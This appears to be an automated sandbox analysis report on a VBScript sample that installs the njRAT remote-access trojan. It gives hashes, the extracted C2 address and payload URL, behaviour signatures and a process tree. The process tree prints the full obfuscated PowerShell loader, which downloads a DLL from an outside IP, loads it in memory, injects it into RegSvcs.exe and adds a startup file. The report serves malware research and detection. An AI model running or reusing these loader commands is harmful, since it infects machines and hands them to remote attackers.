Analysis
-
max time kernel
147s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
01/09/2022, 19:12
Static task
static1
Behavioral task
behavioral1
Sample
7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab.vbs
Resource
win7-20220812-en
General
-
Target
7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab.vbs
-
Size
205KB
-
MD5
55f65c5be5331616022acfa14b13cf0d
-
SHA1
5715298639b8fa40e9621a9a1e5f4e12feb801ab
-
SHA256
7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab
-
SHA512
eaa7b7cea085d6703ad604cef958426b05da22930e451f65676b0f57631e0c7328ec089b8480debc41c2ecefddd8a7e173c4f9acce5baea72476fa983f934153
-
SSDEEP
96:W6Ww7isRFEDD7174KWOktsKFSG4qYk/uU95coQ18HE:l/FEDHxIBKoTjcX18k
Malware Config
Extracted
http://91.241.19.49/QWERTY/CRTZ/Dllf3.txt
Extracted
njrat
0.7NC
NYAN CAT
nyas22.duckdns.org:57831
8521e1f80fc24
-
reg_key
8521e1f80fc24
-
splitter
@!#&^%$
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 13 4896 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wed373kNHihfo908378&$!#$%&uhhjfn7wd.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wed373kNHihfo908378&$!#$%&uhhjfn7wd.vbs powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4896 set thread context of 1320 4896 powershell.exe 87 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2724 powershell.exe 2724 powershell.exe 4896 powershell.exe 4896 powershell.exe -
Suspicious use of AdjustPrivilegeToken 33 IoCs
description pid Process Token: SeDebugPrivilege 2724 powershell.exe Token: SeDebugPrivilege 4896 powershell.exe Token: SeDebugPrivilege 1320 RegSvcs.exe Token: 33 1320 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1320 RegSvcs.exe Token: 33 1320 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1320 RegSvcs.exe Token: 33 1320 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1320 RegSvcs.exe Token: 33 1320 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1320 RegSvcs.exe Token: 33 1320 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1320 RegSvcs.exe Token: 33 1320 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1320 RegSvcs.exe Token: 33 1320 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1320 RegSvcs.exe Token: 33 1320 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1320 RegSvcs.exe Token: 33 1320 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1320 RegSvcs.exe Token: 33 1320 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1320 RegSvcs.exe Token: 33 1320 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1320 RegSvcs.exe Token: 33 1320 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1320 RegSvcs.exe Token: 33 1320 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1320 RegSvcs.exe Token: 33 1320 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1320 RegSvcs.exe Token: 33 1320 RegSvcs.exe Token: SeIncBasePriorityPrivilege 1320 RegSvcs.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1980 wrote to memory of 2724 1980 WScript.exe 83 PID 1980 wrote to memory of 2724 1980 WScript.exe 83 PID 2724 wrote to memory of 4896 2724 powershell.exe 85 PID 2724 wrote to memory of 4896 2724 powershell.exe 85 PID 4896 wrote to memory of 1320 4896 powershell.exe 87 PID 4896 wrote to memory of 1320 4896 powershell.exe 87 PID 4896 wrote to memory of 1320 4896 powershell.exe 87 PID 4896 wrote to memory of 1320 4896 powershell.exe 87 PID 4896 wrote to memory of 1320 4896 powershell.exe 87 PID 4896 wrote to memory of 1320 4896 powershell.exe 87 PID 4896 wrote to memory of 1320 4896 powershell.exe 87 PID 4896 wrote to memory of 1320 4896 powershell.exe 87
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAEsASQB0AE8ATwBQAF⌚⌚⌚AaQBTAE8AVQBsAFEARABqAHYAWABBAE8AZwAlACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsA⌚⌚⌚wB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgA0ADEALgAxADkALgA0ADkALwBRAFcARQBSAFQAWQAvAEMA⌚⌚⌚gB⌚⌚⌚AFoALwBEAGwAbABmADMALgB0AHgAdAAnACkAKQA7AFsA⌚⌚⌚wB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAH⌚⌚⌚AcgByAG⌚⌚⌚AbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQARABMAEwAKQAuAEcAZQB0AFQAeQBwAG⌚⌚⌚AKAAnAHgASwB2AEsAawB1AE4AWgAuAF⌚⌚⌚ARwBsAHkAbQB6AF⌚⌚⌚AZwAnACkALgBHAG⌚⌚⌚AdABNAG⌚⌚⌚AdABoAG8AZAAoACcAVQBEAHMA⌚⌚⌚wBpAEQAYgBiACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH⌚⌚⌚AbABsACwAIABbAG8AYgBqAG⌚⌚⌚AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AMgBYAFoALwB3AG⌚⌚⌚AbgAvAHQAcwBlAHQALwA5ADQALgA5ADEALgAxADQAMgAuADEAOQAvAC8AOgBwAHQAdABoACcAIAAsACAAJABSAG8AZABhAEMAbwBwAHkAIAAsACAAJwB3AG⌚⌚⌚AZAAzADcAMwBrAE4ASABpAGgAZgBvADkAMAA4ADMANwA4ACYAJAAhACIAIwAkAC⌚⌚⌚AJgB1AGgAaABqAGYAbgA3AHcAZAAnACAAKQApAA==';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('%KItOOPUiSOUlQDjvXAOg%', 'C:\Users\Admin\AppData\Local\Temp\7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\7566214bddcf5c73e06b9e5c7504212b8632a9d97fb28446dc9a2cf2feaf42ab.vbs';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/QWERTY/CRTZ/Dllf3.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.2XZ/wen/tset/94.91.142.19//:ptth' , $RodaCopy , 'wed373kNHihfo908378&$!"#$%&uhhjfn7wd' ))"3⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1320
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD5a6c9d692ed2826ecb12c09356e69cc09
SHA1def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA5122f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3